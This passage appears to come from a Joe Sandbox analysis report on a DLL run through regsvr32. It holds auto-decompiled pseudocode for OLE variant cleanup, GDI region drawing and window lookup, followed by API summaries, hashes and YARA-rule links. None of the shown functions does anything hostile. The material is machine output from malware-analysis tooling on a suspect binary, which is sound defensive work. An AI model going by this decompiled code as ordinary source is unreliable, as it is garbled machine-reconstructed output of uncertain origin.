							_t214 = 0;
						}
					}
					_t242 = 0;
					E10010592(_t247 - 0x3c);
					if( *(_t247 + 0x10) != _t214) {
						_t242 = _t247 - 0x3c;
					}
					E10011C50(_t247 - 0x6c, _t214, 0x20);
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x28))));
					 *(_t247 - 0x2c) =  *(_t247 - 0x2c) | 0xffffffff;
					 *(_t247 + 0x18) =  *((intOrPtr*)( *_t170 + 0x18))(_t170,  *((intOrPtr*)(_t247 + 8)), 0x10043018, _t214,  *(_t247 + 0xc), _t247 - 0x4c, _t242, _t247 - 0x6c, _t247 - 0x2c);
					_t172 =  *(_t247 - 0x44);
					if(_t172 != _t214) {
						_t214 = (_t172 << 4) +  *((intOrPtr*)(_t247 - 0x4c)) - 0x10;
						_t242 = _t235;
						if( *_t235 != 0) {
							do {
								_t192 =  *_t242;
								if(_t192 == 8 || _t192 == 0xe) {
									__imp__#9(_t214);
								}
								_t214 = _t214 - 0x10;
								_t242 = _t242 + 1;
								_t273 =  *_t242;
							} while ( *_t242 != 0);
						}
					}
					_push( *((intOrPtr*)(_t247 - 0x4c)));
					_t161 = L1001F7A9(_t214, _t235, _t242, _t273);
					_pop(_t221);
					if( *(_t247 + 0x18) >= 0) {
						L63:
						_t242 =  *(_t247 + 0x10);
						__eflags = _t242;
						if(_t242 != 0) {
							__eflags = _t242 - 0xc;
							if(_t242 != 0xc) {
								_t174 = _t247 - 0x3c;
								__imp__#12(_t174, _t174, 0, _t242);
								_t236 = _t174;
								__eflags = _t236;
								if(_t236 < 0) {
									__imp__#9(_t247 - 0x3c);
									_push(_t236);
									goto L67;
								}
							}
							goto L68;
						}
					} else {
						__imp__#9(_t247 - 0x3c);
						if( *(_t247 + 0x18) == 0x80020009) {
							__eflags =  *(_t247 - 0x54);
							if( *(_t247 - 0x54) != 0) {
								 *(_t247 - 0x54)(_t247 - 0x6c);
							}
							_t178 = E1001F77E(0x20);
							_pop(_t221);
							 *(_t247 + 0x14) = _t178;
							__eflags = _t178;
							 *(_t247 - 4) = 0;
							if(__eflags == 0) {
								_t243 = 0;
								__eflags = 0;
							} else {
								_push( *((intOrPtr*)(_t247 - 0x6c)));
								_t221 = _t178;
								_push(0);
								_push(0);
								_t243 = E10039A54(_t178, __eflags);
							}
							 *(_t247 - 4) =  *(_t247 - 4) | 0xffffffff;
							__eflags =  *(_t247 - 0x68);
							_t237 = __imp__#6;
							if( *(_t247 - 0x68) != 0) {
								_t113 = _t243 + 0x18; // 0x18
								_t221 = _t113;
								E1000860E(_t113,  *(_t247 - 0x68));
								 *_t237( *(_t247 - 0x68));
							}
							__eflags =  *(_t247 - 0x64);
							if( *(_t247 - 0x64) != 0) {
								_t117 = _t243 + 0xc; // 0xc
								_t221 = _t117;
								E1000860E(_t117,  *(_t247 - 0x64));
								 *_t237( *(_t247 - 0x64));
							}
							__eflags =  *(_t247 - 0x60);
							if( *(_t247 - 0x60) != 0) {
								_t121 = _t243 + 0x14; // 0x14
								_t221 = _t121;
								E1000860E(_t121,  *(_t247 - 0x60));
								 *_t237( *(_t247 - 0x60));
							}
							 *((intOrPtr*)(_t243 + 0x10)) =  *((intOrPtr*)(_t247 - 0x5c));
							 *((intOrPtr*)(_t243 + 0x1c)) =  *((intOrPtr*)(_t247 - 0x50));
							 *(_t247 + 0x14) = _t243;
							_t161 = E10011C0F(_t247 + 0x14, 0x100483f4);
							goto L63;
						} else {
							_push( *(_t247 + 0x18));
							L67:
							E100387D9(_t221);
							L68:
							_t161 = (_t242 & 0x0000ffff) + 0xfffffffe;
							if(_t161 <= 0x13) {
								switch( *((intOrPtr*)(_t161 * 4 +  &M1003A037))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 1:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 4:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x34);
										__ecx =  *(__ebp - 0x30);
										 *(__eax + 4) =  *(__ebp - 0x30);
										goto L79;
									case 5:
										__eax = E1003702D(__eax,  *(__ebp + 0x14),  *(__ebp - 0x34));
										_push( *(__ebp - 0x34));
										__imp__#6();
										goto L79;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x34) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *( *(__ebp + 0x14)) = __eflags != 0;
										goto L79;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x3c;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L79;
									case 8:
										goto L79;
									case 9:
										_t161 =  *(_t247 + 0x14);
										 *_t161 =  *((intOrPtr*)(_t247 - 0x34));
										goto L79;
								}
							}
						}
					}
				}
				L79:
				 *[fs:0x0] =  *((intOrPtr*)(_t247 - 0xc));
				return _t161;
			}






































                                                                                                            0x10039b2b
                                                                                                            0x10039b30
                                                                                                            0x10039b38
                                                                                                            0x10039b3b
                                                                                                            0x10039b41
                                                                                                            0x10039b45
                                                                                                            0x10039b48
                                                                                                            0x10039b55
                                                                                                            0x10039b5a
                                                                                                            0x10039b5d
                                                                                                            0x10039b62
                                                                                                            0x10039b70
                                                                                                            0x10039b64
                                                                                                            0x10039b65
                                                                                                            0x10039b6b
                                                                                                            0x10039b6b
                                                                                                            0x10039b77
                                                                                                            0x10039b7e
                                                                                                            0x10039b83
                                                                                                            0x10039b8a
                                                                                                            0x10039b8a
                                                                                                            0x10039b8f
                                                                                                            0x10039b9e
                                                                                                            0x10039ba9
                                                                                                            0x10039bac
                                                                                                            0x10039bb7
                                                                                                            0x10039bbd
                                                                                                            0x10039bc1
                                                                                                            0x10039bc4
                                                                                                            0x10039bc7
                                                                                                            0x10039bcd
                                                                                                            0x10039bd0
                                                                                                            0x10039bd3
                                                                                                            0x10039bd3
                                                                                                            0x10039bdb
                                                                                                            0x10039bde
                                                                                                            0x10039be1
                                                                                                            0x10039be2
                                                                                                            0x10039be5
                                                                                                            0x10039beb
                                                                                                            0x10039bee
                                                                                                            0x10039bf1
                                                                                                            0x10039bfb
                                                                                                            0x10039bfb
                                                                                                            0x10039bfe
                                                                                                            0x10039c06
                                                                                                            0x10039c08
                                                                                                            0x10039d38
                                                                                                            0x10039d3d
                                                                                                            0x10039d40
                                                                                                            0x10039d42
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039d49
                                                                                                            0x10039d4c
                                                                                                            0x10039d4e
                                                                                                            0x10039d54
                                                                                                            0x10039d5c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039d42
                                                                                                            0x10039c0e
                                                                                                            0x10039c0e
                                                                                                            0x10039d60
                                                                                                            0x10039d60
                                                                                                            0x10039d63
                                                                                                            0x10039d63
                                                                                                            0x10039d65
                                                                                                            0x10039d67
                                                                                                            0x10039d67
                                                                                                            0x10039c14
                                                                                                            0x10039c15
                                                                                                            0x10039c19
                                                                                                            0x10039c1f
                                                                                                            0x00000000
                                                                                                            0x10039c26
                                                                                                            0x10039c29
                                                                                                            0x10039c2b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c54
                                                                                                            0x10039c58
                                                                                                            0x10039c5d
                                                                                                            0x10039c60
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c67
                                                                                                            0x10039c6b
                                                                                                            0x10039c70
                                                                                                            0x10039c73
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c7a
                                                                                                            0x10039c7d
                                                                                                            0x10039c7d
                                                                                                            0x10039c7f
                                                                                                            0x10039c81
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c90
                                                                                                            0x10039c93
                                                                                                            0x10039c95
                                                                                                            0x10039c97
                                                                                                            0x10039c98
                                                                                                            0x10039c9b
                                                                                                            0x10039ca1
                                                                                                            0x10039ca5
                                                                                                            0x10039ca7
                                                                                                            0x10039cad
                                                                                                            0x10039caf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039caf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039d10
                                                                                                            0x10039d13
                                                                                                            0x10039d17
                                                                                                            0x10039d19
                                                                                                            0x10039c2e
                                                                                                            0x10039c2e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039d20
                                                                                                            0x10039d24
                                                                                                            0x10039d27
                                                                                                            0x10039d2a
                                                                                                            0x10039d2c
                                                                                                            0x10039d2d
                                                                                                            0x10039d2e
                                                                                                            0x10039d2f
                                                                                                            0x10039d30
                                                                                                            0x10039d33
                                                                                                            0x10039d35
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039cba
                                                                                                            0x10039cba
                                                                                                            0x10039cbd
                                                                                                            0x10039cbf
                                                                                                            0x10039cc1
                                                                                                            0x10039cc3
                                                                                                            0x10039cc6
                                                                                                            0x10039ccb
                                                                                                            0x10039cd1
                                                                                                            0x10039cd2
                                                                                                            0x10039cd5
                                                                                                            0x10039cd7
                                                                                                            0x10039cda
                                                                                                            0x10039cda
                                                                                                            0x10039ce2
                                                                                                            0x10039cee
                                                                                                            0x10039cee
                                                                                                            0x10039cf3
                                                                                                            0x10039cf4
                                                                                                            0x10039cfa
                                                                                                            0x10039cfe
                                                                                                            0x10039d00
                                                                                                            0x10039d02
                                                                                                            0x10039d04
                                                                                                            0x10039cb5
                                                                                                            0x10039cb5
                                                                                                            0x00000000
                                                                                                            0x10039cb5
                                                                                                            0x10039d04
                                                                                                            0x10039d06
                                                                                                            0x10039d09
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c46
                                                                                                            0x10039c49
                                                                                                            0x10039c4d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c36
                                                                                                            0x10039c39
                                                                                                            0x10039c3c
                                                                                                            0x10039c3e
                                                                                                            0x10039c41
                                                                                                            0x10039c83
                                                                                                            0x10039c83
                                                                                                            0x10039c88
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c1f
                                                                                                            0x10039c19
                                                                                                            0x10039c0e
                                                                                                            0x10039d69
                                                                                                            0x10039d69
                                                                                                            0x10039d6d
                                                                                                            0x10039d70
                                                                                                            0x10039d79
                                                                                                            0x10039d79
                                                                                                            0x10039d82
                                                                                                            0x10039d85
                                                                                                            0x10039d85
                                                                                                            0x10039bc7
                                                                                                            0x10039d8b
                                                                                                            0x10039d8d
                                                                                                            0x10039d96
                                                                                                            0x10039d98
                                                                                                            0x10039d98
                                                                                                            0x10039da2
                                                                                                            0x10039daa
                                                                                                            0x10039dac
                                                                                                            0x10039dd2
                                                                                                            0x10039dd5
                                                                                                            0x10039dda
                                                                                                            0x10039de5
                                                                                                            0x10039de9
                                                                                                            0x10039deb
                                                                                                            0x10039ded
                                                                                                            0x10039ded
                                                                                                            0x10039df1
                                                                                                            0x10039df8
                                                                                                            0x10039df8
                                                                                                            0x10039dfe
                                                                                                            0x10039e01
                                                                                                            0x10039e02
                                                                                                            0x10039e02
                                                                                                            0x10039ded
                                                                                                            0x10039deb
                                                                                                            0x10039e07
                                                                                                            0x10039e0a
                                                                                                            0x10039e14
                                                                                                            0x10039e15
                                                                                                            0x10039ecc
                                                                                                            0x10039ecc
                                                                                                            0x10039ecf
                                                                                                            0x10039ed2
                                                                                                            0x10039ed8
                                                                                                            0x10039edc
                                                                                                            0x10039ee0
                                                                                                            0x10039ee5
                                                                                                            0x10039eeb
                                                                                                            0x10039eed
                                                                                                            0x10039eef
                                                                                                            0x10039ef5
                                                                                                            0x10039efb
                                                                                                            0x00000000
                                                                                                            0x10039efb
                                                                                                            0x10039eef
                                                                                                            0x00000000
                                                                                                            0x10039edc
                                                                                                            0x10039e1b
                                                                                                            0x10039e1f
                                                                                                            0x10039e2c
                                                                                                            0x10039e36
                                                                                                            0x10039e39
                                                                                                            0x10039e3f
                                                                                                            0x10039e3f
                                                                                                            0x10039e44
                                                                                                            0x10039e49
                                                                                                            0x10039e4a
                                                                                                            0x10039e4d
                                                                                                            0x10039e4f
                                                                                                            0x10039e52
                                                                                                            0x10039e64
                                                                                                            0x10039e64
                                                                                                            0x10039e54
                                                                                                            0x10039e54
                                                                                                            0x10039e57
                                                                                                            0x10039e59
                                                                                                            0x10039e5a
                                                                                                            0x10039e60
                                                                                                            0x10039e60
                                                                                                            0x10039e66
                                                                                                            0x10039e6a
                                                                                                            0x10039e6d
                                                                                                            0x10039e73
                                                                                                            0x10039e78
                                                                                                            0x10039e78
                                                                                                            0x10039e7b
                                                                                                            0x10039e83
                                                                                                            0x10039e83
                                                                                                            0x10039e85
                                                                                                            0x10039e88
                                                                                                            0x10039e8d
                                                                                                            0x10039e8d
                                                                                                            0x10039e90
                                                                                                            0x10039e98
                                                                                                            0x10039e98
                                                                                                            0x10039e9a
                                                                                                            0x10039e9d
                                                                                                            0x10039ea2
                                                                                                            0x10039ea2
                                                                                                            0x10039ea5
                                                                                                            0x10039ead
                                                                                                            0x10039ead
                                                                                                            0x10039eb2
                                                                                                            0x10039eb8
                                                                                                            0x10039ec4
                                                                                                            0x10039ec7
                                                                                                            0x00000000
                                                                                                            0x10039e2e
                                                                                                            0x10039e2e
                                                                                                            0x10039efc
                                                                                                            0x10039efc
                                                                                                            0x10039f01
                                                                                                            0x10039f04
                                                                                                            0x10039f0a
                                                                                                            0x10039f0c
                                                                                                            0x00000000
                                                                                                            0x10039f1d
                                                                                                            0x10039f24
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f7f
                                                                                                            0x10039f82
                                                                                                            0x10039f85
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f3c
                                                                                                            0x10039f3f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f46
                                                                                                            0x10039f49
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f29
                                                                                                            0x10039f2c
                                                                                                            0x10039f2f
                                                                                                            0x10039f31
                                                                                                            0x10039f34
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f53
                                                                                                            0x10039f58
                                                                                                            0x10039f5b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f63
                                                                                                            0x10039f66
                                                                                                            0x10039f68
                                                                                                            0x10039f6c
                                                                                                            0x10039f6f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f73
                                                                                                            0x10039f76
                                                                                                            0x10039f79
                                                                                                            0x10039f7a
                                                                                                            0x10039f7b
                                                                                                            0x10039f7c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f13
                                                                                                            0x10039f19
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f0c
                                                                                                            0x10039f0a
                                                                                                            0x10039e2c
                                                                                                            0x10039e15
                                                                                                            0x10039f87
                                                                                                            0x10039f8d
                                                                                                            0x10039f98

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10039B2B
                                                                                                            • lstrlenA.KERNEL32(?,?,?), ref: 10039B65
                                                                                                            • VariantClear.OLEAUT32(?), ref: 10039DF8
                                                                                                            • VariantClear.OLEAUT32(?), ref: 10039E1F
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 10039E83
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 10039E98
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 10039EAD
                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 10039EE5
                                                                                                            • VariantClear.OLEAUT32(?), ref: 10039EF5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 344392101-0
                                                                                                            • Opcode ID: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                                                            • Instruction ID: b8867a34d175485d2cb2ae4ba9cdbf6ea03067932d09ff1053ffea89e27b22ec
                                                                                                            • Opcode Fuzzy Hash: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                                                            • Instruction Fuzzy Hash: DBE1697590021ADFDF12CFA8D881AAEBBF5FF45342F214429E951EB261D730AE51CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10033FCE Relevance: 19.7, APIs: 13, Instructions: 233windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10033FCE(intOrPtr* __ecx, void* __eflags) {
				void* __esi;
				void* _t132;
				void* _t145;
				intOrPtr* _t226;
				void* _t229;

				E10011BF0(0x1003b231, _t229);
				_t226 = __ecx;
				 *((intOrPtr*)(_t229 - 0x30)) = 0;
				 *((intOrPtr*)(_t229 - 0x34)) = 0x10040668;
				 *(_t229 - 4) = 0;
				 *((intOrPtr*)(_t229 - 0x28)) = 0;
				 *((intOrPtr*)(_t229 - 0x2c)) = 0x10040668;
				 *((intOrPtr*)(_t229 - 0x20)) = 0;
				 *((intOrPtr*)(_t229 - 0x24)) = 0x10040668;
				 *(_t229 - 4) = 2;
				E1000B4EC(_t229 - 0x2c,  *(_t229 + 8));
				CopyRect(_t229 - 0x44,  *(_t229 + 8));
				InflateRect(_t229 - 0x44,  ~( *(_t229 + 0xc)),  ~( *(_t229 + 0x10)));
				IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 8));
				E1002935D(_t229 - 0x24, CreateRectRgnIndirect(_t229 - 0x44));
				E1002935D(_t229 - 0x34, CreateRectRgn(0, 0, 0, 0));
				E10010478(_t229 - 0x34, _t229 - 0x2c, _t229 - 0x24, 3);
				_t235 =  *((intOrPtr*)(_t229 + 0x20));
				if( *((intOrPtr*)(_t229 + 0x20)) == 0) {
					 *((intOrPtr*)(_t229 + 0x20)) = E10033F2F(_t226, _t235);
				}
				if( *((intOrPtr*)(_t229 + 0x24)) == 0) {
					 *((intOrPtr*)(_t229 + 0x24)) =  *((intOrPtr*)(_t229 + 0x20));
				}
				 *((intOrPtr*)(_t229 - 0x18)) = 0;
				 *((intOrPtr*)(_t229 - 0x1c)) = 0x10040668;
				 *((intOrPtr*)(_t229 - 0x10)) = 0;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x10040668;
				 *(_t229 - 4) = 4;
				if( *(_t229 + 0x14) != 0) {
					E1002935D(_t229 - 0x1c, CreateRectRgn(0, 0, 0, 0));
					E1001045D(_t229 - 0x2c,  *(_t229 + 0x14));
					CopyRect(_t229 - 0x44,  *(_t229 + 0x14));
					InflateRect(_t229 - 0x44,  ~( *(_t229 + 0x18)),  ~( *(_t229 + 0x1c)));
					IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 0x14));
					E1001045D(_t229 - 0x24, _t229 - 0x44);
					E10010478(_t229 - 0x1c, _t229 - 0x2c, _t229 - 0x24, 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4))) {
						E1002935D(_t229 - 0x14, CreateRectRgn(0, 0, 0, 0));
						E10010478(_t229 - 0x14, _t229 - 0x1c, _t229 - 0x34, 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4)) &&  *(_t229 + 0x14) != 0) {
					E10028E1A(_t226, _t229 - 0x1c);
					 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
					 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x24)));
					PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
					E10029439(_t226,  *(_t229 + 0x14));
				}
				_t132 = _t229 - 0x14;
				if( *((intOrPtr*)(_t229 - 0x10)) == 0) {
					_t132 = _t229 - 0x34;
				}
				E10028E1A(_t226, _t132);
				 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
				 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x20)));
				PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
				if( *(_t229 + 0x14) != 0) {
					E10029439(_t226,  *(_t229 + 0x14));
				}
				E10028E1A(_t226, 0);
				 *(_t229 - 4) = 3;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x1003eb6c;
				E100293B4(_t229 - 0x14);
				 *(_t229 - 4) = 2;
				 *((intOrPtr*)(_t229 - 0x1c)) = 0x1003eb6c;
				E100293B4(_t229 - 0x1c);
				 *(_t229 - 4) = 1;
				 *((intOrPtr*)(_t229 - 0x24)) = 0x1003eb6c;
				E100293B4(_t229 - 0x24);
				 *(_t229 - 4) = 0;
				 *((intOrPtr*)(_t229 - 0x2c)) = 0x1003eb6c;
				E100293B4(_t229 - 0x2c);
				 *(_t229 - 4) =  *(_t229 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t229 - 0x34)) = 0x1003eb6c;
				_t145 = E100293B4(_t229 - 0x34);
				 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
				return _t145;
			}








                                                                                                            0x10033fd3
                                                                                                            0x10033fe5
                                                                                                            0x10033fe7
                                                                                                            0x10033fea
                                                                                                            0x10033fed
                                                                                                            0x10033ff0
                                                                                                            0x10033ff3
                                                                                                            0x10033ff6
                                                                                                            0x10033ff9
                                                                                                            0x10034002
                                                                                                            0x10034006
                                                                                                            0x10034012
                                                                                                            0x10034028
                                                                                                            0x10034036
                                                                                                            0x1003404a
                                                                                                            0x1003405d
                                                                                                            0x1003406f
                                                                                                            0x10034074
                                                                                                            0x10034077
                                                                                                            0x1003407e
                                                                                                            0x1003407e
                                                                                                            0x10034084
                                                                                                            0x10034089
                                                                                                            0x10034089
                                                                                                            0x1003408c
                                                                                                            0x1003408f
                                                                                                            0x10034092
                                                                                                            0x10034095
                                                                                                            0x1003409b
                                                                                                            0x1003409f
                                                                                                            0x100340b5
                                                                                                            0x100340c0
                                                                                                            0x100340cc
                                                                                                            0x100340e2
                                                                                                            0x100340f0
                                                                                                            0x100340fd
                                                                                                            0x1003410f
                                                                                                            0x10034120
                                                                                                            0x1003412c
                                                                                                            0x1003413e
                                                                                                            0x1003413e
                                                                                                            0x10034120
                                                                                                            0x10034155
                                                                                                            0x10034162
                                                                                                            0x1003416f
                                                                                                            0x10034182
                                                                                                            0x1003419b
                                                                                                            0x100341a2
                                                                                                            0x100341a2
                                                                                                            0x100341aa
                                                                                                            0x100341ad
                                                                                                            0x100341af
                                                                                                            0x100341af
                                                                                                            0x100341b5
                                                                                                            0x100341c2
                                                                                                            0x100341d5
                                                                                                            0x100341ee
                                                                                                            0x100341f3
                                                                                                            0x100341fa
                                                                                                            0x100341fa
                                                                                                            0x10034202
                                                                                                            0x1003420f
                                                                                                            0x10034213
                                                                                                            0x10034216
                                                                                                            0x1003421e
                                                                                                            0x10034222
                                                                                                            0x10034225
                                                                                                            0x1003422d
                                                                                                            0x10034231
                                                                                                            0x10034234
                                                                                                            0x1003423c
                                                                                                            0x1003423f
                                                                                                            0x10034242
                                                                                                            0x10034247
                                                                                                            0x1003424e
                                                                                                            0x10034251
                                                                                                            0x1003425c
                                                                                                            0x10034264

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10033FD3
                                                                                                              • Part of subcall function 1000B4EC: CreateRectRgnIndirect.GDI32(00000000), ref: 1000B4F3
                                                                                                            • CopyRect.USER32 ref: 10034012
                                                                                                            • InflateRect.USER32(?,?,?), ref: 10034028
                                                                                                            • IntersectRect.USER32 ref: 10034036
                                                                                                            • CreateRectRgnIndirect.GDI32(?), ref: 10034040
                                                                                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034053
                                                                                                              • Part of subcall function 10010478: CombineRgn.GDI32(?,?,?,00000003), ref: 1001049B
                                                                                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100340AF
                                                                                                            • CopyRect.USER32 ref: 100340CC
                                                                                                            • InflateRect.USER32(?,?,?), ref: 100340E2
                                                                                                            • IntersectRect.USER32 ref: 100340F0
                                                                                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034126
                                                                                                              • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                                                              • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                                                              • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                                                            • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 1003419B
                                                                                                              • Part of subcall function 10029439: SelectObject.GDI32(?,00000000), ref: 1002945B
                                                                                                              • Part of subcall function 10029439: SelectObject.GDI32(?,00000004), ref: 10029471
                                                                                                            • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 100341EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prologPattern
                                                                                                            • String ID:
                                                                                                            • API String ID: 897514543-0
                                                                                                            • Opcode ID: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                                                            • Instruction ID: e5f9903ccf7cdd00105ec8572482158fef9e459befd851420e55a1fcda6e3601
                                                                                                            • Opcode Fuzzy Hash: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                                                            • Instruction Fuzzy Hash: 4191EFB690010DEFCF06DFA4D995CEEBBB9EF08244F51411AF906A7251DB34AE06CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100219DD Relevance: 19.7, APIs: 13, Instructions: 174windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E100219DD(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E100202AB(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
